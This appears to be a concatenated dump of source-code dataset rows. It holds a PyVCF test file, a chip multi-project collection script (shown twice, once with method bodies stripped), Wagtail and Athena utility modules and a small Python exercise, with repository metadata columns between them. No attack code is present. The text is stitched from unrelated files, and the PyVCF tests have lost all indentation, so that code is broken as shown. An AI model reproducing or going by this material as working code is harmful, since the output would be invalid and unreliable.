reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
is_del = var.is_deletion
if var.POS == 14370:
self.assertEqual(False, is_del)
if var.POS == 17330:
self.assertEqual(False, is_del)
if var.POS == 1110696:
self.assertEqual(False, is_del)
if var.POS == 1230237:
self.assertEqual(True, is_del)
elif var.POS == 1234567:
self.assertEqual(False, is_del)
def test_var_type(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
type = var.var_type
if var.POS == 14370:
self.assertEqual("snp", type)
if var.POS == 17330:
self.assertEqual("snp", type)
if var.POS == 1110696:
self.assertEqual("snp", type)
if var.POS == 1230237:
self.assertEqual("indel", type)
elif var.POS == 1234567:
self.assertEqual("indel", type)
# SV tests
reader = vcf.Reader(fh('example-4.1-sv.vcf'))
for var in reader:
type = var.var_type
if var.POS == 2827693:
self.assertEqual("sv", type)
if var.POS == 321682:
self.assertEqual("sv", type)
if var.POS == 14477084:
self.assertEqual("sv", type)
if var.POS == 9425916:
self.assertEqual("sv", type)
elif var.POS == 12665100:
self.assertEqual("sv", type)
elif var.POS == 18665128:
self.assertEqual("sv", type)
def test_var_subtype(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
subtype = var.var_subtype
if var.POS == 14370:
self.assertEqual("ts", subtype)
if var.POS == 17330:
self.assertEqual("tv", subtype)
if var.POS == 1110696:
self.assertEqual("unknown", subtype)
if var.POS == 1230237:
self.assertEqual("del", subtype)
elif var.POS == 1234567:
self.assertEqual("unknown", subtype)
# SV tests
reader = vcf.Reader(fh('example-4.1-sv.vcf'))
for var in reader:
subtype = var.var_subtype
if var.POS == 2827693:
self.assertEqual("DEL", subtype)
if var.POS == 321682:
self.assertEqual("DEL", subtype)
if var.POS == 14477084:
self.assertEqual("DEL:ME:ALU", subtype)
if var.POS == 9425916:
self.assertEqual("INS:ME:L1", subtype)
elif var.POS == 12665100:
self.assertEqual("DUP", subtype)
elif var.POS == 18665128:
self.assertEqual("DUP:TANDEM", subtype)
def test_is_sv(self):
reader = vcf.Reader(fh('example-4.1-sv.vcf'))
for var in reader:
is_sv = var.is_sv
if var.POS == 2827693:
self.assertEqual(True, is_sv)
if var.POS == 321682:
self.assertEqual(True, is_sv)
if var.POS == 14477084:
self.assertEqual(True, is_sv)
if var.POS == 9425916:
self.assertEqual(True, is_sv)
elif var.POS == 12665100:
self.assertEqual(True, is_sv)
elif var.POS == 18665128:
self.assertEqual(True, is_sv)
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
is_sv = var.is_sv
if var.POS == 14370:
self.assertEqual(False, is_sv)
if var.POS == 17330:
self.assertEqual(False, is_sv)
if var.POS == 1110696:
self.assertEqual(False, is_sv)
if var.POS == 1230237:
self.assertEqual(False, is_sv)
elif var.POS == 1234567:
self.assertEqual(False, is_sv)
def test_is_sv_precise(self):
reader = vcf.Reader(fh('example-4.1-sv.vcf'))
for var in reader:
is_precise = var.is_sv_precise
if var.POS == 2827693:
self.assertEqual(True, is_precise)
if var.POS == 321682:
self.assertEqual(False, is_precise)
if var.POS == 14477084:
self.assertEqual(False, is_precise)
if var.POS == 9425916:
self.assertEqual(False, is_precise)
elif var.POS == 12665100:
self.assertEqual(False, is_precise)
elif var.POS == 18665128:
self.assertEqual(False, is_precise)
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
is_precise = var.is_sv_precise
if var.POS == 14370:
self.assertEqual(False, is_precise)
if var.POS == 17330:
self.assertEqual(False, is_precise)
if var.POS == 1110696:
self.assertEqual(False, is_precise)
if var.POS == 1230237:
self.assertEqual(False, is_precise)
elif var.POS == 1234567:
self.assertEqual(False, is_precise)
def test_sv_end(self):
reader = vcf.Reader(fh('example-4.1-sv.vcf'))
for var in reader:
sv_end = var.sv_end
if var.POS == 2827693:
self.assertEqual(2827680, sv_end)
if var.POS == 321682:
self.assertEqual(321887, sv_end)
if var.POS == 14477084:
self.assertEqual(14477381, sv_end)
if var.POS == 9425916:
self.assertEqual(9425916, sv_end)
elif var.POS == 12665100:
self.assertEqual(12686200, sv_end)
elif var.POS == 18665128:
self.assertEqual(18665204, sv_end)
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
sv_end = var.sv_end
if var.POS == 14370:
self.assertEqual(None, sv_end)
if var.POS == 17330:
self.assertEqual(None, sv_end)
if var.POS == 1110696:
self.assertEqual(None, sv_end)
if var.POS == 1230237:
self.assertEqual(None, sv_end)
elif var.POS == 1234567:
self.assertEqual(None, sv_end)
def test_qual(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
qual = var.QUAL
qtype = type(qual)
if var.POS == 14370:
expected = 29
if var.POS == 17330:
expected = 3.0
if var.POS == 1110696:
expected = 1e+03
if var.POS == 1230237:
expected = 47
elif var.POS == 1234567:
expected = None
self.assertEqual(expected, qual)
self.assertEqual(type(expected), qtype)
def test_info_multiple_values(self):
reader = vcf.Reader(fh('example-4.1-info-multiple-values.vcf'))
var = reader.next()
# check Float type INFO field with multiple values
expected = [19.3, 47.4, 14.0]
actual = var.INFO['RepeatCopies']
self.assertEqual(expected, actual)
# check Integer type INFO field with multiple values
expected = [42, 14, 56]
actual = var.INFO['RepeatSize']
self.assertEqual(expected, actual)
# check String type INFO field with multiple values
expected = ['TCTTATCTTCTTACTTTTCATTCCTTACTCTTACTTACTTAC', 'TTACTCTTACTTAC', 'TTACTCTTACTTACTTACTCTTACTTACTTACTCTTACTTACTTACTCTTATCTTC']
actual = var.INFO['RepeatConsensus']
self.assertEqual(expected, actual)
def test_pickle(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
assert cPickle.loads(cPickle.dumps(var)) == var
class TestCall(unittest.TestCase):
def test_phased(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
phases = [s.phased for s in var.samples]
if var.POS == 14370:
self.assertEqual([True, True, False], phases)
if var.POS == 17330:
self.assertEqual([True, True, False], phases)
if var.POS == 1110696:
self.assertEqual([True, True, False], phases)
if var.POS == 1230237:
self.assertEqual([True, True, False], phases)
elif var.POS == 1234567:
self.assertEqual([False, False, False], phases)
def test_gt_bases(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
gt_bases = [s.gt_bases for s in var.samples]
if var.POS == 14370:
self.assertEqual(['G|G', 'A|G', 'A/A'], gt_bases)
elif var.POS == 17330:
self.assertEqual(['T|T', 'T|A', 'T/T'], gt_bases)
elif var.POS == 1110696:
self.assertEqual(['G|T', 'T|G', 'T/T'], gt_bases)
elif var.POS == 1230237:
self.assertEqual(['T|T', 'T|T', 'T/T'], gt_bases)
elif var.POS == 1234567:
self.assertEqual([None, 'GTCT/GTACT', 'G/G'], gt_bases)
def test_gt_types(self):
reader = vcf.Reader(fh('example-4.0.vcf'))
for var in reader:
for s in var:
print(s.data)
gt_types = [s.gt_type for s in var.samples]
if var.POS == 14370:
self.assertEqual([0,1,2], gt_types)
elif var.POS == 17330:
self.assertEqual([0,1,0], gt_types)
elif var.POS == 1110696:
self.assertEqual([1,1,2], gt_types)
elif var.POS == 1230237:
self.assertEqual([0,0,0], gt_types)
elif var.POS == 1234567:
self.assertEqual([None,1,2], gt_types)
class TestTabix(unittest.TestCase):
def setUp(self):
self.reader = vcf.Reader(fh('tb.vcf.gz', 'rb'))
self.run = vcf.parser.pysam is not None
def testFetchRange(self):
if not self.run:
return
lines = list(self.reader.fetch('20', 14370, 14370))
self.assertEquals(len(lines), 1)
self.assertEqual(lines[0].POS, 14370)
lines = list(self.reader.fetch('20', 14370, 17330))
self.assertEquals(len(lines), 2)
self.assertEqual(lines[0].POS, 14370)
self.assertEqual(lines[1].POS, 17330)
lines = list(self.reader.fetch('20', 1110695, 1234567))
self.assertEquals(len(lines), 3)
def testFetchSite(self):
if not self.run:
return
site = self.reader.fetch('20', 14370)
assert site.POS == 14370
site = self.reader.fetch('20', 14369)
assert site is None
class TestOpenMethods(unittest.TestCase):
samples = 'NA00001 NA00002 NA00003'.split()
def fp(self, fname):
return os.path.join(os.path.dirname(__file__), fname)
def testOpenFilehandle(self):
r = vcf.Reader(fh('example-4.0.vcf'))
self.assertEqual(self.samples, r.samples)
self.assertEqual('example-4.0.vcf', os.path.split(r.filename)[1])
def testOpenFilename(self):
r = vcf.Reader(filename=self.fp('example-4.0.vcf'))
self.assertEqual(self.samples, r.samples)
def testOpenFilehandleGzipped(self):
r = vcf.Reader(fh('tb.vcf.gz', 'rb'))
self.assertEqual(self.samples, r.samples)
def testOpenFilenameGzipped(self):
r = vcf.Reader(filename=self.fp('tb.vcf.gz'))
self.assertEqual(self.samples, r.samples)
class TestFilter(unittest.TestCase):
def testApplyFilter(self):
# FIXME: broken with distribute
return
s, out = commands.getstatusoutput('python scripts/vcf_filter.py --site-quality 30 test/example-4.0.vcf sq')
#print(out)
assert s == 0
buf = StringIO()
buf.write(out)
buf.seek(0)
print(buf.getvalue())
reader = vcf.Reader(buf)
# check filter got into output file
assert 'sq30' in reader.filters
print(reader.filters)
# check sites were filtered
n = 0
for r in reader:
if r.QUAL < 30:
assert 'sq30' in r.FILTER
n += 1
else:
assert 'sq30' not in r.FILTER
assert n == 2
def testApplyMultipleFilters(self):
# FIXME: broken with distribute
return
s, out = commands.getstatusoutput('python scripts/vcf_filter.py --site-quality 30 '
'--genotype-quality 50 test/example-4.0.vcf sq mgq')
assert s == 0
#print(out)
buf = StringIO()
buf.write(out)
buf.seek(0)
reader = vcf.Reader(buf)
print(reader.filters)
assert 'mgq50' in reader.filters
assert 'sq30' in reader.filters
class TestRegression(unittest.TestCase):
def test_issue_16(self):
reader = vcf.Reader(fh('issue-16.vcf'))
n = reader.next()
assert n.QUAL == None
def test_null_mono(self):
# null qualities were written as blank, causing subsequent parse to fail
print(os.path.abspath(os.path.join(os.path.dirname(__file__), 'null_genotype_mono.vcf') ))
p = vcf.Reader(fh('null_genotype_mono.vcf'))
assert p.samples
out = StringIO()
writer = vcf.Writer(out, p)
for record in p:
writer.write_record(record)
out.seek(0)
print(out.getvalue())
p2 = vcf.Reader(out)
rec = p2.next()
assert rec.samples
class TestUtils(unittest.TestCase):
def test_walk(self):
# easy case: all same sites
reader1 = vcf.Reader(fh('example-4.0.vcf'))
reader2 = vcf.Reader(fh('example-4.0.vcf'))
reader3 = vcf.Reader(fh('example-4.0.vcf'))
n = 0
for x in utils.walk_together(reader1, reader2, reader3):
assert len(x) == 3
assert (x[0] == x[1]) and (x[1] == x[2])
n+= 1
assert n == 5
# artificial case 2 from the left, 2 from the right, 2 together, 1 from the right, 1 from the left
expected = 'llrrttrl'
reader1 = vcf.Reader(fh('walk_left.vcf'))
reader2 = vcf.Reader(fh('example-4.0.vcf'))
for ex, recs in zip(expected, utils.walk_together(reader1, reader2)):
if ex == 'l':
assert recs[0] is not None
assert recs[1] is None
if ex == 'r':
assert recs[1] is not None
assert recs[0] is None
if ex == 't':
assert recs[0] is not None
assert recs[1] is not None
def test_trim(self):
tests = [('TAA GAA', 'T G'),
('TA TA', 'T T'),
('AGTTTTTA AGTTTA', 'AGTT AG'),
('TATATATA TATATA', 'TAT T'),
('TATATA TATATATA', 'T TAT'),
('ACCCCCCC ACCCCCCCCCC ACCCCCCCCC ACCCCCCCCCCC', 'A ACCC ACC ACCCC')]
for sequences, expected in tests:
self.assertEqual(utils.trim_common_suffix(*sequences.split()),
expected.split())
class TestGATKMeta(unittest.TestCase):
def test_meta(self):
# expect no exceptions raised
reader = vcf.Reader(fh('gatk_26_meta.vcf'))
assert 'GATKCommandLine' in reader.metadata
assert reader.metadata['GATKCommandLine'][0]['CommandLineOptions'] == '"analysis_type=LeftAlignAndTrimVariants"'
assert reader.metadata['GATKCommandLine'][1]['CommandLineOptions'] == '"analysis_type=VariantAnnotator annotation=[HomopolymerRun, VariantType, TandemRepeatAnnotator]"'
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestGatkOutput))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestFreebayesOutput))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestSamtoolsOutput))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestBcfToolsOutput))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestGatkOutputWriter))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestBcfToolsOutputWriter))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestWriterDictionaryMeta))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestTabix))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestOpenMethods))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestFilter))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(Test1kg))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(Test1kgSites))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestGoNL))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestSamplesSpace))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestMixedFiltering))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestRecord))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestCall))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestRegression))
suite.addTests(unittest.TestLoader().loadTestsFromTestCase(TestVcfSpecs))
| 25,397 | 3,446 | 1,585 |
2b23c694cce3e26db30642f22c91aac8af8436c3 | 9,940 | py | Python | collect.py | urish/multi_project_tools | b2b8a2988b9647626955bfbb78993b57fcff3f56 | [
"Apache-2.0"
] | 20 | 2021-03-03T11:04:43.000Z | 2022-03-17T00:17:07.000Z | collect.py | urish/multi_project_tools | b2b8a2988b9647626955bfbb78993b57fcff3f56 | [
"Apache-2.0"
] | 32 | 2021-05-01T21:01:14.000Z | 2022-03-17T18:13:10.000Z | collect.py | urish/multi_project_tools | b2b8a2988b9647626955bfbb78993b57fcff3f56 | [
"Apache-2.0"
] | 16 | 2021-03-07T15:39:40.000Z | 2022-03-21T23:21:56.000Z | from utils import *
import subprocess
import copy
from project import Project
from codegen.caravel_codegen import generate_openlane_files
from codegen.allocator import allocate_macros
REQUIRED_KEYS_GROUP = ["projects", "caravel", "lvs"]
class Collection(object):
"""
* generate an index.md with a section for each project
- title, author, description, link, picture
* could also create the info.yaml file for efabless
* tile all images for final image
"""
| 43.406114 | 123 | 0.582394 | from utils import *
import subprocess
import copy
from project import Project
from codegen.caravel_codegen import generate_openlane_files
from codegen.allocator import allocate_macros
REQUIRED_KEYS_GROUP = ["projects", "caravel", "lvs"]
class Collection(object):
def __init__(self, args):
self.args = args
self.config = parse_config(args.config, REQUIRED_KEYS_GROUP)
self.projects = []
if not (0 < len(self.config['projects']) <= 16):
logging.error("bad number of projects - must be > 0 and <= 16")
exit(1)
# build the list of projects
for project_info in self.config['projects'].values():
repo = project_info["repo"]
commit = project_info["commit"]
required_interfaces = list(self.config['interfaces']['required'].keys())
project = Project(args, repo, commit, required_interfaces, self.config)
# if --project is given, skip others
if self.args.project is not None:
if self.args.project != project.id:
continue
# start from a given project if --from is given
if self.args.test_from is not None:
if project.id < self.args.test_from:
continue
# append
self.projects.append(project)
# fill space with duplicated projects
if args.fill and args.fill > len(self.projects):
num_real_projects = len(self.projects)
# make the copies
for i in range(len(self.projects), args.fill):
dup_project = copy.deepcopy(self.projects[i % num_real_projects])
dup_project.id = i
dup_project.config['caravel_test']['instance_name'] += str(dup_project.id)
self.projects.append(dup_project)
# assert ids are unique
ids = [project.id for project in self.projects]
if len(ids) != len(set(ids)):
logging.error("not all project ids are unique: %s" % ids)
exit(1)
self.macro_allocation = {}
self.width = self.config['configuration']['user_area_width']
self.height = self.config['configuration']['user_area_height']
self.interface_definitions = {
**self.config['interfaces']['required'],
**self.config['interfaces']['optional']
}
def run_tests(self):
for project in self.projects:
project.run_tests()
def copy_gds(self):
macros_dir = os.path.join(self.config['caravel']['root'], 'openlane', 'user_project_wrapper', 'macros', 'lef')
lef_dir = os.path.join(self.config['caravel']['root'], 'openlane', 'user_project_wrapper', 'macros', 'lef')
gds_dir = os.path.join(self.config['caravel']['root'], 'openlane', 'user_project_wrapper', 'macros', 'gds')
# macros directory might not exist
os.makedirs(macros_dir, exist_ok=True)
try_mkdir(lef_dir, self.args.force_delete)
try_mkdir(gds_dir, self.args.force_delete)
for project in self.projects:
src = os.path.join(project.directory, project.gds_filename)
dst = os.path.join(gds_dir, os.path.basename(project.gds_filename))
logging.info("copying %s to %s" % (src, dst))
shutil.copyfile(src, dst)
src = os.path.join(project.directory, project.lef_filename)
dst = os.path.join(lef_dir, os.path.basename(project.lef_filename))
logging.info("copying %s to %s" % (src, dst))
shutil.copyfile(src, dst)
# gl
project.copy_gl()
def annotate_image(self):
final_gds_file = os.path.join(self.config['caravel']['root'], 'gds', 'user_project_wrapper.gds.gz')
# dump a 2000x2000 image with klayout to pics/multi_macro.png, check the dump_pic.rb file
cmd = "klayout -l caravel.lyp %s -r dump_pic.rb" % final_gds_file
logging.info(cmd)
os.system(cmd)
image_file = os.path.join('pics', 'multi_macro.png')
from PIL import Image, ImageFont, ImageDraw
font_author = ImageFont.truetype("/usr/share/fonts/dejavu/DejaVuSans.ttf", 27)
font_title = ImageFont.truetype("/usr/share/fonts/dejavu/DejaVuSans.ttf", 22)
img = Image.open(image_file)
draw = ImageDraw.Draw(img)
px_per_um = self.config['docs']['px_per_um']
macro_border = self.config['docs']['macro_border']
user_width = self.width * px_per_um
user_height = self.height * px_per_um
x_offset = (2000 - user_width) / 2
y_offset = (2000 - user_height) / 2
allocation = self.allocate_macros()
logging.info("annotating image")
for project in self.projects:
alloc = allocation[project.id]
logging.info(project)
x = x_offset + alloc[0] * px_per_um - macro_border
y = 2000 - (y_offset + alloc[1] * px_per_um - macro_border) # flip, gds is bottom left 0,0, png is top left 0,0
# takes a while
macro_w, macro_h = project.get_gds_size()
macro_w = macro_w * px_per_um + 2*macro_border
macro_h = macro_h * px_per_um + 2*macro_border
draw.text((x,y-macro_h-70), project.author, (0,0,0), font=font_author)
draw.text((x,y-macro_h-40), project.title, (0,0,0), font=font_title)
draw.line((x, y , x + macro_w, y ), fill=(0,0,0), width=2)
draw.line((x + macro_w, y , x + macro_w, y - macro_h), fill=(0,0,0), width=2)
draw.line((x + macro_w, y - macro_h, x , y - macro_h), fill=(0,0,0), width=2)
draw.line((x , y - macro_h, x , y ), fill=(0,0,0), width=2)
annotated_image_file = os.path.join('pics', 'multi_macro_annotated.png')
img.save(annotated_image_file)
def allocate_macros(self):
# allocate macros and generate macro.cfg
allocation = allocate_macros(
design_size_x = self.width,
design_size_y = self.height,
h_edge = 344,
v_edge = 464,
macro_snap = self.config['configuration']['macro_snap'],
projects = self.projects,
allocation_policy = "legacy",
openram = self.args.openram
)
return allocation
def create_openlane_config(self):
### generate user wrapper and include ###
user_project_wrapper_path = os.path.join(self.config['caravel']['rtl_dir'], "user_project_wrapper.v")
user_project_includes_path = os.path.join(self.config['caravel']['rtl_dir'], "user_project_includes.v")
generate_openlane_files(
self.projects,
self.interface_definitions,
user_project_wrapper_path,
user_project_includes_path,
None,
self.args.openram
)
### copy out rtl ###
for project in self.projects:
project.copy_project_to_caravel_rtl()
# copy the local config.tcl file
src = 'config.tcl'
dst = os.path.join(self.config['caravel']['root'], 'openlane', 'user_project_wrapper', 'config.tcl')
logging.info(f"copying {src} to {dst}")
shutil.copyfile(src, dst)
allocation = self.allocate_macros()
macro_inst_file = os.path.join(self.config['caravel']['root'], 'openlane', 'user_project_wrapper', 'macro.cfg')
with open(macro_inst_file, "w") as f:
for project in self.projects:
name = project.title
alloc = allocation[project.id]
# TODO fixme! this is also generated in caravel_codegen
verilog_name = project.module_name + "_" + str(project.id)
logging.info(f"placing {verilog_name} @ {alloc}")
f.write(f"{verilog_name} {alloc[0]} {alloc[1]} N\n")
if self.args.openram:
# TODO
f.write(f"openram_1kB 344 464 N\n")
"""
with open("obs.txt", "w") as f:
for project in self.projects:
alloc = allocation[project.id]
macro_w, macro_h = project.get_gds_size()
f.write("met 4 %.2d %.2d %.2d %.2d,\n" % (alloc[0]+5, alloc[1]+5, alloc[0]+macro_w-5, alloc[1]+macro_h-5))
f.write("met 3 %.2d %.2d %.2d %.2d,\n" % (alloc[0]+5, alloc[1]+5, alloc[0]+macro_w-5, alloc[1]+macro_h-5))
f.write("met 2 %.2d %.2d %.2d %.2d,\n" % (alloc[0]+5, alloc[1]+5, alloc[0]+macro_w-5, alloc[1]+macro_h-5))
"""
"""
* generate an index.md with a section for each project
- title, author, description, link, picture
* could also create the info.yaml file for efabless
* tile all images for final image
"""
def generate_docs(self):
fh = open("index.md", 'w')
fh.write("# Multi Project Index\n\n")
fh.write("This index was made with [multi project tools](https://github.com/mattvenn/multi_project_tools)\n\n")
try_mkdir(self.config["docs"]["pic_dir"], self.args.force_delete)
for project in self.projects:
conf = project.config["project"]
# copy pic
pic_src = os.path.join(project.directory, conf["picture"])
pic_dst = os.path.join(self.config["docs"]["pic_dir"], os.path.basename(conf["picture"]))
shutil.copyfile(pic_src, pic_dst)
fh.write("## %s\n\n" % conf["title"])
fh.write("* Author: %s\n" % conf["author"])
fh.write("* Github: %s\n" % project.repo)
fh.write("* commit: %s\n" % project.gitsha)
fh.write("* Description: %s\n\n" % conf["description"])
fh.write("\n\n" % (conf["title"], pic_dst))
logging.info("wrote index.md")
| 9,251 | 0 | 188 |
e1caf081041c836642d517f7b95a24f4ecab4547 | 31 | py | Python | src/ctc/__init__.py | JLuisRojas/reconocimiento-de-voz | 59282ffd6841f22e514a7055cb4d20ef97181b90 | [
"MIT"
] | 1 | 2021-12-03T00:01:09.000Z | 2021-12-03T00:01:09.000Z | src/ctc/__init__.py | JLuisRojas/reconocimiento-de-voz | 59282ffd6841f22e514a7055cb4d20ef97181b90 | [
"MIT"
] | 2 | 2021-04-30T21:11:01.000Z | 2021-08-25T16:00:42.000Z | src/ctc/__init__.py | JLuisRojas/reconocimiento-de-voz | 59282ffd6841f22e514a7055cb4d20ef97181b90 | [
"MIT"
] | null | null | null | from .ctc_loss import get_loss
| 15.5 | 30 | 0.83871 | from .ctc_loss import get_loss
| 0 | 0 | 0 |
3267ba79cb24231f425d7146d4e0f06bc22b758f | 288 | py | Python | wagtail/wagtaildocs/permissions.py | yohanlebret/wagtail | 03c623b467ef8ed3849872273ebad13d48f755ac | [
"BSD-3-Clause"
] | null | null | null | wagtail/wagtaildocs/permissions.py | yohanlebret/wagtail | 03c623b467ef8ed3849872273ebad13d48f755ac | [
"BSD-3-Clause"
] | null | null | null | wagtail/wagtaildocs/permissions.py | yohanlebret/wagtail | 03c623b467ef8ed3849872273ebad13d48f755ac | [
"BSD-3-Clause"
] | 1 | 2019-03-05T15:37:22.000Z | 2019-03-05T15:37:22.000Z | from wagtail.wagtailcore.permission_policies import OwnershipPermissionPolicy
from wagtail.wagtaildocs.models import Document, get_document_model
permission_policy = OwnershipPermissionPolicy(
get_document_model(),
auth_model=Document,
owner_field_name='uploaded_by_user'
)
| 28.8 | 77 | 0.840278 | from wagtail.wagtailcore.permission_policies import OwnershipPermissionPolicy
from wagtail.wagtaildocs.models import Document, get_document_model
permission_policy = OwnershipPermissionPolicy(
get_document_model(),
auth_model=Document,
owner_field_name='uploaded_by_user'
)
| 0 | 0 | 0 |
a93bb7d8be77c1f82c175aea7aaffbcef63d7b51 | 4,728 | py | Python | zapr/utils/Utils.py | zapr-oss/zapr-athena-client | 3fd953120b7eb64e4325f44a5be8a0b464741ab6 | [
"Apache-2.0"
] | 1 | 2020-11-05T09:25:51.000Z | 2020-11-05T09:25:51.000Z | zapr/utils/Utils.py | zapr-oss/zapr-athena-client | 3fd953120b7eb64e4325f44a5be8a0b464741ab6 | [
"Apache-2.0"
] | 1 | 2021-05-03T11:30:53.000Z | 2021-05-03T11:30:53.000Z | zapr/utils/Utils.py | zapr-oss/zapr-athena-client | 3fd953120b7eb64e4325f44a5be8a0b464741ab6 | [
"Apache-2.0"
] | 2 | 2020-11-05T09:25:54.000Z | 2022-03-18T19:17:33.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sys
import os
import re
RUNNING = "RUNNING"
SUCCEEDED = "SUCCEEDED"
QUEUED = "QUEUED"
FAILED = "FAILED"
CANCELLED = "CANCELLED"
S3 = "s3://"
S3A = "s3a://"
| 40.067797 | 116 | 0.626904 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sys
import os
import re
RUNNING = "RUNNING"
SUCCEEDED = "SUCCEEDED"
QUEUED = "QUEUED"
FAILED = "FAILED"
CANCELLED = "CANCELLED"
S3 = "s3://"
S3A = "s3a://"
class Utils:
def __init__(self, logger):
self.logger = logger
def get_query_string(selt, query_location):
with open(query_location, "r") as query_file:
data = query_file.read()
return data
def replacing_macro(self, query_string, total_args):
for x in range(4, total_args):
macro_input = sys.argv[x]
macro, macro_value = macro_input.split('=',1)
macro = "${" + macro + "}"
self.logger.info("Replacing {0} with {1} ".format(macro, macro_value))
query_string = query_string.replace(macro, macro_value)
return query_string
def validate_all_macros(self, query_string):
matched_string = re.search(".*\${.*}", query_string)
if matched_string is not None:
self.logger.error("Unable to replace the some of the macros value in query {}".format(query_string))
sys.exit(os.EX_IOERR)
def split_queries(self, query_string):
queries = query_string.rstrip().split(";")
queries = filter(None, queries)
return queries
def is_drop_table(self, query):
result = re.search("^([\s]*)DROP([\s]+)TABLE([\s]+)([.,^.]*)",query,flags=re.IGNORECASE)
return result
def is_create_table(self, query):
result = re.search("^([\s]*)CREATE([\s]+)TABLE([\s]+)([.,^.]*)",query,flags=re.IGNORECASE)
return result
def is_insert_into_table(self, query):
result = re.search("^([\s]*)INSERT([\s]+)INTO([\s]+)([.,^.]*)",query,flags=re.IGNORECASE)
return result
def get_table_name_drop_table(self, drop_table_query):
self.logger.info("drop table query ....." + drop_table_query)
result = re.sub("^DROP","", drop_table_query.lstrip(), flags=re.IGNORECASE)
result = re.sub("TABLE","", result, count=1, flags=re.IGNORECASE)
if result is not None and len(result.strip()) != 0:
table_name = result.split()[0]
return table_name
return None
def get_database_table(self, table_name):
try:
db, table = table_name.split('.')
return db, table
except ValueError:
self.logger.error("Unable to read table name and database from the given string {0}".format(table_name))
sys.exit(os.EX_IOERR)
def split_s3_path(self, s3_path):
path_parts = s3_path.replace(S3, "").replace(S3A, "").split("/")
s3_bucket = path_parts.pop(0)
prefix = "/".join(path_parts)
return s3_bucket, prefix
def get_table_name_from_insert_query(self, insert_into_query):
self.logger.info("insert into query....." + insert_into_query)
result = re.sub("^INSERT","", insert_into_query.lstrip(), flags=re.IGNORECASE)
result = re.sub("INTO","", result, count=1, flags=re.IGNORECASE)
if result is not None and len(result.strip()) != 0:
table_name = result.split()[0]
return table_name
return None
def set_staging_table_property(self,
staging_table_name,
athena_result_location,
table_storage_descriptor,
table_partition_keys):
staging_s3_location = athena_result_location + staging_table_name
table_storage_descriptor['Location'] = staging_s3_location
staging_table_properties = {'Name': staging_table_name,
'StorageDescriptor': table_storage_descriptor,
'TableType': 'EXTERNAL_TABLE',
'PartitionKeys': table_partition_keys}
return staging_table_properties, staging_s3_location
| 3,410 | -9 | 374 |
96b383db1e54c60b9a15e346577ac101d4194a10 | 278 | py | Python | 2. Programming Fundamentals With Python (May 2021)/16. Objects and Classes/02_party.py | kzborisov/SoftUni | ccb2b8850adc79bfb2652a45124c3ff11183412e | [
"MIT"
] | 1 | 2021-02-07T07:51:12.000Z | 2021-02-07T07:51:12.000Z | 2. Programming Fundamentals With Python (May 2021)/16. Objects and Classes/02_party.py | kzborisov/softuni | 9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751 | [
"MIT"
] | null | null | null | 2. Programming Fundamentals With Python (May 2021)/16. Objects and Classes/02_party.py | kzborisov/softuni | 9c5b45c74fa7d9748e9b3ea65a5ae4e15c142751 | [
"MIT"
] | null | null | null | # Task 02. Party
person = input()
party = Party()
while not person == "End":
party.people.append(person)
person = input()
print(f"Going: {', '.join(party.people)}")
print(f"Total: {len(party.people)}")
| 15.444444 | 42 | 0.607914 | # Task 02. Party
class Party:
def __init__(self):
self.people = []
person = input()
party = Party()
while not person == "End":
party.people.append(person)
person = input()
print(f"Going: {', '.join(party.people)}")
print(f"Total: {len(party.people)}")
| 23 | -9 | 49 |
2125751ead55c05b7652d6be63798d48bf0ad2aa | 936 | py | Python | day:40/twosumdesign.py | hawaijar/FireLeetcode | e981e96f6a38a3b08e9b7ef59aec65f6e0e5728a | [
"MIT"
] | 1 | 2020-10-21T12:28:23.000Z | 2020-10-21T12:28:23.000Z | day:40/twosumdesign.py | hawaijar/FireLeetcode | e981e96f6a38a3b08e9b7ef59aec65f6e0e5728a | [
"MIT"
